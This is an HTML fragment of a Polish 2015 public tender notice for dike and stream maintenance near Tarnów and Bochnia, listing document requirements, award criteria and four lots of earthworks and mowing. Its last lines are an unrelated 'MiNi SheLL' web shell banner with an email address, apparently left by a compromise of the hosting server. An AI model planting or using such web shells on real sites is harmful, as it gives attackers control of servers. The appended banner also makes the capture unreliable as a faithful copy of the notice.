<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.95</li>
<li>2 - Warunki płatności - 0.05</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy stanowi załącznik do siwz. 1. Strony dopuszczają możliwość zmiany treści umowy w następujących przypadkach: a. zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG) w trakcie realizacji zamówienia; b. zmiany kont bankowych, c. wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy, d. w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie za okresy realizacji umowy przypadające po wprowadzeniu zmienionej stawki podatku od towarów i usług ulegnie odpowiedniej zmianie, w taki sposób, aby wynikająca z umowy cena netto pozostała niezmieniona, e. zmian regulacji prawnych obowiązujących w dniu podpisania umowy lub po jej podpisaniu, f. zgodnie z art. 144 ust.1 ustawy Prawo zamówień publicznych - dopuszcza się możliwość wprowadzenia innych, nieistotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy 2. Zmiana terminów wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku wystąpienia okoliczności niezależnych od Wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na terminy realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego, w Tarnowie przy ul. Ostrogskich 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2015 godzina 09:30, miejsce: W siedzibie Zamawiającego, w Tarnowie przy ul. Ostrogskich 5 w sekretariacie pok. nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wały rzeki Żabnica-Breń w km P: 11+330-11+650, 11+650-13+410, 14+190-14+200, 14+720-14+730, 15+390-15+400, 15+710-15+720, 15+800-15+810, 15+900-17+200, 17+380-18+270, 20+900-21+300, L: 11+240-11+250, 12+200-12+350, 12+400-12+500, 12+580-12+590 - likwidacja kolein i zaniżeń ramp przejazdowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadania pn:
Wały rzeki Żabnica-Breń w km P: 11+330-11+650, 11+650-13+410, 14+190-14+200, 14+720-14+730, 15+390-15+400, 15+710-15+720, 15+800-15+810, 15+900-17+200, 17+380-18+270, 20+900-21+300, L: 11+240-11+250, 12+200-12+350, 12+400-12+500, 12+580-12+590 - likwidacja kolein i zaniżeń ramp przejazdowych.
Zamówienie obejmuje:
Wał prawy km 11+330-11+650, 11+650-13+410, 15+900-17+200, 17+380-18+270, 20+900-21+300; Wał lewy km 12+200-12+350, 12+400-12+500 łącznie z rampami 7 szt.:
wykoszenie porostów z korony wału porost gęsty twardy - 12275 m2, likwidacja kolein w koronie wału poprzez zasypanie gruntem kategorii III  z transportem urobku z 6 km samochodami samowyładowczymi z usunięciem warstwy ziemi urodzajnej z korony do ponownego wbudowania z zagęszczeniem - 2530,83 m3, obsianie koron wałów mieszanką traw - 11613 m2
Rampy wał prawy w km 14+190-14+200, 14+720-14+730, 15+390-15+400, 15+710-15+720, 15+800-15+810; Wał lewy w km 11+240-11+250, 12+580-12+590:
uzupełnienie nawierzchni płytami ażurowymi typu krata mała o wymiarach elementów 90x60 (zbrojone) 14 ramp - 186,72 m2, uzupełnienie nawierzchni z klińca kamiennego o grubości po zgęszczeniu 10cm - 630 m2, uzupełnienie nawierzchni z tłucznia kamiennego z warstwą górną o grubości po zgęszczeniu 10cm - 630 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. Warunki płatności - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prawy wał potoku Wielopólka w km 0+000-0+780 - likwidacja kolein.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadania pn:
Prawy wał potoku Wielopólka w km 0+000-0+780 - likwidacja kolein.
Zamówienie obejmuje:
Wykoszenie porostów z korony i skarpy wału porost gęsty twardy - 3900 m2, wygrabianie wykoszonych porostów ze skarp o szerokości ponad 2,0m	- 3900 m2, likwidacja kolein w koronie wału poprzez zasypanie gruntem kategorii III z ukopu z usunięciem warstwy ziemi urodzajnej z korony do ponownego wbudowania z zagęszczeniem - 748,8 m3, naprawa cząstkowa skarp i dna rowka odpływowego od śluzy umocnionego prefabrykowanymi płytami żelbetowymi o wymiarach 10x60x90cm - 6,48 m2, obsianie korony wału mieszanką traw - 1248 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. Warunki płatności - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Potok Proszowski w km 0+000-7+500 uregulowany - konserwacja bieżąca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadania pn:
Potok Proszowski w km 0+000-7+500 uregulowany - konserwacja bieżąca
Zamówienie obejmuje:
Ręczne wykoszenie porostów gęstych twardych ze skarp obustronnie - w km 0+000-0+320 szer. skarp 5,0 m, w km 0+320-0+700 szer. skarp 4,0 m,  w km 0+700-1+627 szer. skarp  3,0 m, w km 2+610-2+747 szer. skarp 3,0 m, w km 4+119-4+171 szer. skarp 3,0 m, w km 7+048-7+500 szer. skarp 2,0m, -	14744,00 m2, wygrabienie wykoszonych porostów ze skarp o szerokości ponad 2,0m ze złożeniem przy górnej krawędzi skarp - 14744,00 m2, ręczne wykoszenie porostów gęstych twardych z dna potoku -  w km 0+000-0+700 szer. dna 1,2 m, w km 0+700-1+627 szer. dna 1,0 m, w  km 2+610-2+747 szer. dna 1,0 m, w km 4+119-4+171 szer. dna 1,0 m,  w km 7+048-7+100 szer.  dna 1,0 m, w km 7+100- 7+500 szer. dna 0,8m - 2328,00 m2, wygrabianie wykoszonych porostów z dna cieków o szerokości do 2,0m ze złożeniem przy górnej krawędzi skarp - 2328,00 m2, udrożnienie dna potoku - w  km 0+300-1+627,  w  km  2+610-2+747,  w  km 4+119- 4+171,  w  km 7+048 - 7+100  - szer. dna 1,0 m, zamulenie do 20cm - wyrzucenie namułu na pobocze przy krawędzi skarpy z rozplantowaniem  względnie odłożenie na uszkodzonych skarpach z ubiciem i wyrównaniem powierzchni skarp potoku - 1568,00 mb, udrożnienie dna potoku - w  km 7+100-7+500  - szer. dna 0,8 m, zamulenie do 20cm - wyrzucenie namułu na pobocze względnie ułożenie na uszkodzonych skarpach, rozplantowanie namułu lub ubicie zasypanych skarp i wyrównanie, oczyszczenie pasów szer. 0,6 m wzdłuż krawędzi cieku - 400,00 mb, oczyszczanie kęp z krzaków lub starek przy poroście rzadkim lub średnim ze złożeniem przy górnej krawędzi skarp potoku, przycięcie zwisających gałęzi z drzew - 450,00m2, ręczne usunięcie z przerzutem, warstwy ziemi urodzajnej z darnią grubości do 15cm, wyrzucenie na pobocze z rozplantowaniem względnie odłożenie  na uszkodzonych skarpach potoku z ubiciem i wyrównaniem zasypanych skarp (ścięcie zwisów) - 680,40 m2, oczyszczenie przepustów rurowych o średnicy 0,80m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy - 16,00 m, oczyszczenie koryta potoku z lokalnych zatorów z cienkich i grubych gałęzi, trawy i  ziemi z przerzutem na pobocze z ułożeniem przy górnych skarpach potoku - 12,60 m3, ręczne wykoszenie porostów gęstych twardych ze skarp obustronnie -  w km 1+627- 2+610 szer. skarp  3,0 m, w km 2+747-4+119 szer. skarp 3,0 m, w km 4+171-7+048 szer. skarp 3,0 m - 31392,00 m2, wygrabianie wykoszonych porostów ze skarp o szerokości ponad 2,0m ze złożeniem przy górnej krawędzi skarp	- 31392,00 m2, ręczne wykoszenie porostów gęstych twardych z dna potoku - w km 1+627-1+822 szer. dna 1,0 m,  w  km 1+822-2+156  szer. dna 1,30 m, w km 2+156-2+610 szer. dna 1,0 m, w km 2+747-4+119 szer. dna 1,30 m, w km 4+171-5+176 szer. dna 1,0 m, w km 5+176-7+048 szer. dna 1,30 m - 6305,40 m2, wygrabienie wykoszonych porostów z dna cieków o szerokości do 2,0m ze złożeniem przy górnej krawędzi skarp - 6305,40 m2, udrożnienie dna potoku (ubezpieczonego kiszkami faszynowymi) - w km 1+627-1+822, w km 2+156-2+610, w km 4+171-5+176 szer. dna 1,0 m, zamulenie do 20cm - wyrzucenie namułu na pobocze względnie ułożenie na uszkodzonych skarpach, rozplantowanie namułu lub ubicie zasypanych skarp i wyrównanie, oczyszczenie pasów szer. 0,6 m wzdłuż krawędzi cieku - 1654,00 mb, udrożnienie dna potoku (ubezpieczonego płytami ażurowymi w dnie i na skarpach) - w km 1+822-2+156, w km 2+747-4+119, w km 5+176-7+048 szer. dna 1,30 m, zamulenie do 20cm - wyrzucenie namułu na pobocze względnie ułożenie na uszkodzonych skarpach, rozplantowanie namułu lub ubicie zasypanych skarp  i wyrównanie, oczyszczenie pasów szer. 0,6 m wzdłuż krawędzi cieku - 3578,00 mb, oczyszczanie kęp z krzaków lub starek przy poroście rzadkim lub średnim ze złożeniem przy górnej krawędzi skarp potoku, przycięcie zwisających gałęzi z drzew - 850,00 m2, ręczne usunięcie z przerzutem warstwy ziemi urodzajnej z darnią grubości do 15cm, wyrzucenie na pobocze z rozplantowaniem względnie odłożenie  na uszkodzonych skarpach potoku z ubiciem i wyrównaniem zasypanych skarp (ścięcie zwisów) - 1569,60 m2, oczyszczenie przepustów rurowych o średnicy 0,60m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy	- 9,00 m, oczyszczenie przepustów rurowych o średnicy 0,80m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy - 24,00 m, oczyszczenie przepustów rurowych o średnicy 1,0m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy - 10,00m, oczyszczenie przepustów rurowych o średnicy 1,50m z namułu o głębokości zamulenia przewodu do 1/3 wysokości średnicy	- 92,00 m, oczyszczenie przepustów ramowych 1,0x1,0m z namułu o głębokości zamulenia przewodu do 1/3 wysokości - 16,00 m, oczyszczenie przepustów ramowych 1,5x1,5m z namułu o głębokości zamulenia przewodu do 1/3 wysokości - 16,00 m, oczyszczenie przepustów ramowych 2,0x2,0m z namułu o głębokości zamulenia przewodu do 1/3 wysokości - 84,00 m, oczyszczenie koryta potoku z lokalnych zatorów z cienkich i grubych gałęzi, trawy i  ziemi z przerzutem na pobocze z ułożeniem przy górnych skarpach potoku - 9,85 m3.
Uwaga. Potok Proszowski w km 1+200-1+450 oraz w km 4+110- 5+000 graniczy z terenem objętym ochroną przyrody - obszarem Natura 2000 Puszcza Niepołomicka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. Warunki płatności - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Potok Łapczycki w km 0+000 - 0+730, 1+870 - 2+110, 3+080 - 4+089 uregulowany w km 0+730 - 1+870, 2+110 - 3+080 nieuregulowany m. Moszczenica, Łapczyca gm. Bochnia - konserwacja bieżąca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi konserwacji bieżącej dla zadania pn:
Potok Łapczycki w km 0+000 - 0+730, 1+870 - 2+110, 3+080 - 4+089 uregulowany w km 0+730 - 1+870, 2+110 - 3+080 nieuregulowany m. Moszczenica, Łapczyca gm. Bochnia - konserwacja bieżąca
Zamówienie obejmuje:
Ręczne wykoszenie porostów gęstych twardych ze skarp  obustronnie w  km  0+000-0+730,  w  km  1+870-2+110  przy  szerokości  skarp 4,0m - 7760 m2, wygrabianie wykoszonych porostów ze skarp o szerokości ponad 2,0m ze złożeniem przy górnej krawędzi skarpy - 7760 m2, oczyszczanie kęp ze zniszczonej wikliny przy poroście gęstym oraz przycięcie zwisających gałęzi drzew, lokalnie w km jw. obustronnie ze złożeniem poza górną krawędzią skarpy - 3692 m2, lokalnie w km 0+000-0+730, w km 1+870-2+110 oraz w km 3+080 -4+089 usunięcie nawisów i nieczystości - wykopy oraz przekopy w gruncie kategorii III  wykonywane na odkład koparką z odłożeniem na brzeg z rozplantowaniem - 251,28 m3, roboty ziemne poprzeczne na przerzut z wbudowaniem ziemi w nasyp w gruncie kategorii III - oczyszczenie  kaskady dwustopniowej i stopnia z namułu i nieczystości z odłożeniem na brzeg - 27 m3, oczyszczenie koryta potoku z lokalnych zatorów z cienkich i grubych gałęzi, trawy i  ziemi z przerzutem na pobocze z ułożeniem przy górnych skarpach potoku - 26,77 m3, roboty ziemne (odmulanie) w gruncie kategorii III z transportem urobku samochodami poza obręb robót - udrożnienie światła pod mostem na drodze E-4 namuł grub. 0,5 m na szer. 7m i dług. 11m oraz udrożnienie przepustu ramowego zamulonego do 1/3 wysokości przepustu - 51,3 m3, ręczne wykoszenie porostów gęstych twardych ze skarp obustronnie w km 0+730 - 1+870,  w  km  2+110 - 3+080 przy szerokości skarp 4,0m  bez wygrabienia - 16880 m2, oczyszczanie kęp ze zniszczonej wikliny przy poroście gęstym oraz przycięcie zwisających gałęzi drzew, lokalnie w km jw. obustronnie ze złożeniem poza górną krawędzią skarpy - 8440 - m2, oczyszczenie koryta potoku z lokalnych zatorów z cienkich i grubych gałęzi, trawy i  ziemi z przerzutem na pobocze z ułożeniem przy górnych skarpach potoku - 38,95 m3, lokalnie  w  km  0+730 - 1+870, w km 2+110 - 3+080 usunięcie nawisów i nieczystości - wykopy oraz przekopy w gruncie kategorii III  wykonywane na odkład koparką z odłożeniem na brzeg z rozplantowaniem - 506,4 m3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. Warunki płatności - 0.05</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com